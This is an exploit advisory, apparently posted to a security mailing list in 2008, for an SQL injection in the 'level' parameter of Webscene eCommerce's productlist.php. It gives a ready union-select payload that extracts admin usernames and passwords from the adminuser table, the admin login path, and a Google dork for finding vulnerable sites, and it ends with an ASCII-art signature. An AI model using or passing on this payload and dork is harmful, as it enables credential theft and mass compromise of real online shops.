<<< Date Index >>>     <<< Thread Index >>>

Webscene eCommerce (level) Remote Sql Injection



#################################################################################
#
#  Webscene eCommerce (level) Remote Sql Injection
#
#  vendor : 
http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
#################################################################################
#
#
#       Bug Found By :Angela Chang (14-10-2008)
#
#       contact: angel[at]ch4ng.cc
#
#
################################################################################
#
#
#      Greetz: nyubi & Vrs-Chk
#
#
###############################################################################

vuln file : productlist.php

Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
          http://somehost/productlist.php?categoryid=20&level=-4 union select 
concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

         
Google dork : inurl:productlist.php?categoryid= level

########################################################################
                   __ _             _                              _            
            __ _  
  __ _    _ _     / _` |   ___     | |    __ _      o O O   __    | |_     __ _ 
   _ _     / _` | 
 / _` |  | ' \    \__, |  / -_)    | |   / _` |    o       / _|   | ' \   / _` 
|  | ' \    \__, | 
 \__,_|  |_||_|   |___/   \___|   _|_|_  \__,_|   TS__[O]  \__|_  |_||_|  
\__,_|  |_||_|   |___/  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
{======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'